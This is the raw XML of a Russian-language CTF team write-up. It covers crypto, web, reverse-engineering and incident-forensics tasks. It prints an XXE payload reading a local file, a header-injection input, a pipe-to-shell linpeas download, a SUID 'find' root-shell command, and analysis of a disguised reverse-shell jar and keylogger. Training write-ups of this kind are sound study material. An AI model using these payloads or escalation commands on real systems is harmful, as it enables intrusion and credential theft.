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CRYPTO-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Первым делом скачали библиотеку sagemath.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Решили посмотреть, как работает исходный скрипт. Проанализировав скрипт, поняли, что флаг передается в байтовом типе данных. Исходя из этого, мы закомментировали строку «from flag import flag» и вставили свою строку «flag = b'nto'».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Скрипт создал файл «hashed», содержащий с</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>писок</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> «[277, 92, 775]». С таких же элементов начинается данный </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">в таске </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">«8cc2c71b-6aed-451b-b346-fa1bee0501a1_hashed.txt». </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Следовательно создаем словарь c алфавитом, который содержит ключ - символ из алфавита "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}" (потенциалье символы флага) - и значение - соответствующий символу код в кодировке данного скрипта.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Получив словарь, создаем скрипт, который будет прогонять элементы списка из «8cc2c71b-6aed-451b-b346-fa1bee0501a1_hashed.txt» и выписывать флаг из соответсвующих данным элементам ключей нашего словаря.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CRYPTO-2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Переходим по ссылке, анализируем скрипт и понимаем, что он принимает GET-запросы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Также видим, что если бит равен 0, то значение всегда будет длиной 308 (опытным путем), иначе длина может быть меньше. Создаем скрипт, который будет направлять на скрипт разные параметры и проверять по 69 раз, что длина возвращаемого ответа равна 308. Если истина, выводим 0, иначе выводим 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Наш скрипт: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62230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3723640" cy="2145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801" t="13190" r="68437" b="5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Последняя строка и есть флаг. Декодируем при помощи «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3272E" w:val="clear"/>
        </w:rPr>
        <w:t>long_to_bytes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(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3272E" w:val="clear"/>
        </w:rPr>
        <w:t>int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'110111001110100011011110111101100110000011010000101111101101110001100000101111101110100001100010110110100110001011011100110011101111101'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2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))</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  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WEB-2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Изучаем исходники. Видим сервер на фреймворке Flask. Обращаем внимание на строчку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payload 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f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"""GET / HTTP/1.1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3272E" w:val="clear"/>
        </w:rPr>
        <w:t>\r\n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Host: 0.0.0.0:3001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3272E" w:val="clear"/>
        </w:rPr>
        <w:t>\r\n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Cookie: username=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{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username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}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;flag=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{FLAG}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3272E" w:val="clear"/>
        </w:rPr>
        <w:t>\r\n\r\n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Видим, что строка(формирование GET-запрос, в который мы можем сами добавить что-то, что сломает функционирование сайта) уязвима к вводу пользователя(поле username). Открываем BurpSuite и пытаемся зарегестрировать пользователя на сайте во время перехвата Burp. Вполне разумно попробовать в поле username во время регистрации вставить например строку вида: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>;flag={FLAG}#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">таким образом мы немного нарушим код и он будет выдавать «I don’t trust you». Происходит это потому что наш сервис 1(с с переменной payload в исходниках) обменивается флагом из своего вирутального окружения и сравнивает его с флагом из виртуального окружения сервиса 2, а так как мы ломаем передачу флага, второй сервис пишет, что флаги не сопадает и выдает ошибку. Но такие рассуждения ни к чему не приведут. Достаточно сломать поле ввода username и password. Это можно сделать добавив в перехваченном пакете Берпом при регистрации \r(header injection) в конце нашего юзернейма и в начале пароля. В BurpSuite строчка будет выглядеть так: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>username=/r(любая строка)/r&amp;password=(любая строчка)/r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">при этом /r должен быть скопирован в BurpSuite как символ, а не введен как строчка. Отправляем этот измененный запрос Burpом(кнопка Intercept). И получаем ошибку на сайте с флагом.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WEB-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Смотрим JS-файл таска и видим, что там есть функции decrypt() и encrypt().Заполняем поля на веб-сервисе, вводя случайные значения. Нажимаем на кнопку «Calculate» и перехватываем запрос через intercept BurpSuite. Обращаем внимание на JSON, который мы отправляем на сервер. Видим, что значение зашифровано. Открываем консоль на веб-сервисе и с помощью функции decrypt() расшифровываем JSON. Получаем что-то наподобие «{"format":"json","data":{"countries":["AFG"],"startdate":"","enddate":"2222-02-22","resttype":1}}». Понимаем, что мы можем подменивать значения, например, формат. Попробуем изменить формат на xml и проэксплуатировать xxe-атаку. Чтобы это сделать, нам надо перевести значение «data» ( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">т. е.  «{"countries":["AFG"],"startdate":"","enddate":"2222-02-22","resttype":1}» </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) JSON на xml с нашей нагрузкой. В итоге получаем следующее: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{"format":"xml","data":"&lt;?xml version='1.0' encoding='UTF-8' ?&gt;&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM 'file:///flag.txt'&gt; ]&gt;&lt;data&gt;&lt;countries&gt;['aAD', 'sdfsdf']&lt;/countries&gt;&lt;startdate&gt;&amp;xxe;&lt;/startdate&gt;&lt;enddate&gt;2222-02-22&lt;/enddate&gt;&lt;resttype&gt;2&lt;/resttype&gt;&lt;/data&gt;"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Далее кодируем это с помощью encrypt(). Возвращаемся в BurpSuite и подмениваем значение data  в запросе сервера. В конечном итоге получаем зашированный ответ от сервера с флагом, декодируем его при помощи decrypt(). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00A933"/>
        </w:rPr>
        <w:t>DoneV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>REVERSE-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Для начала запускаем в wine наш файл (который я назвал hello.exe), он довольно быстро начнинает выводить флаг nto{, но затем начинает постепенно замедляться и становится ясно, что флага мы от него не дождёмся.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Поэтому дизасемблируем код ghdira, а затем декомпилируем.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Очевидно что флаг олжен выводиться в каком-то цикле, поэтому немного поискав находим цикл do while(единственный в нашем файле), поэтому его и будемс расматривать</w:t>
        <w:br/>
        <w:t xml:space="preserve">В глаза сразу бросаются системные прерывания, например </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>INT 0x15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Почитав документацию мы узнаём, что это прерывание отвечает за запуск системного таймера. Видимо это и есть причниа того, что вывод замедляется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Поэтому Используем функцию в ghidra patch instrauction и заменяем прерывание на операцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOP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Теперь созраняем все и запускаем hello.exe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 чудо, со скоростью света, нам выведен флаг nto{}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ЭТАП НОМЕР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Как злоумышленник попал на машину?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Злоумышленник использовал социаьную инженерию и подсунул Сергею вредоносный файл, замаскированный под игру minecraft, так злоумышленник попал на машину с правами пользователя Sergey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1.Мы открыли файл minecraft.jar, чтобы понять как он работает.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Открыв в декопмиляторе мы увиидели, что файл использует класс ReverseShell.class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3.Как видно на скриншоте он подключается к машине злоумышленника и Создаёт оболочу /bin/bash. а затем передаёт туда команды и отправляет злоумышленнику из вывод.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Как повысил свои права?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Злоумышленник скачал через терминал и запустил скрипт LINPEAS командой ‘’curl -L [https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh](https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh) | sh” Она проанализировала систему.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LINPEAS обнаружил команду find у которой включен suid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Затем злоумышленник ввёл команду: find /etc -exec /bin/sh -p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Это позволило получить командную оболочку С правами root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Как сказано было до этого злоумышленник использовал linpeas, об этом свидетельствует то, что в папке downloads был обнаружен файл linpeas.sh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 выводе linpeas можно наблюдать множество информации, Но подсвечивается красным именно информация о команде find с suid, так как повышение привелегий с помощью find suid производится в одну команду(которую мы указали выше), то мы думаем, что вероятнее всего злоумышленник выбрал именно этот вектор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Как злоумышленник узнал пароль от passwords.kdbx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Чтоб узнать что происходило с системой мы зашли в папку /var/log, там мы нашли интересный файл logkeys.log, в нём мы нашли нажатия на кнопки, из которых можно узнать пароль. Скорее всего злоумышленник узнал пароль именно оттуда, с поощью программы keylog, он не является стандартной программой, и в данный момент на машине её нет.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Так что вероятнее всего она была установленна злоумышленником, чтобы украсть пароль пользователя, а затем удалена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Злоумышленник установил кейлоггер (logkeys) для того чтобы украсть пароль, когда пользователь будет его набирать на клавиатуре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Затем он просмотрел логи в /var/log/logkeys.log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Оттуда он узнал пароль 1_D0N7_N0W_WHY_N07_M4Y83_345Y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Куда logkeys пишет логи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 установке logkeys можно выбрать куда программа будет писать логи, но по умолчанию программа logkeys пишет логи в файл /var/log/logkeys.log, там и были обнаружены логи с паролем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Пароль от чего лежит в passwords.kdbx?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После ввода пароля, был открыт файл password.kdbx. В нём оказались учётные данные от аккаунта Administrator(Пароль SecretP@s0rdMayby_0rNot&amp;). Также в поле title написано windows_rdp. Отсюда злоумышленник понял, что учётные данные предназначены для Windows Remote Desktop Protocol(Служба для удалённого доступа к компьютеру)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LibreOffice/7.4.5.1$Linux_X86_64 LibreOffice_project/40$Build-1</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>4</Pages>
  <Words>999</Words>
  <Characters>6860</Characters>
  <CharactersWithSpaces>7854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2023-03-23T14:41:50Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>ru-RU</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-23T20:25:09Z</dcterms:modified>
  <cp:revision>12</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>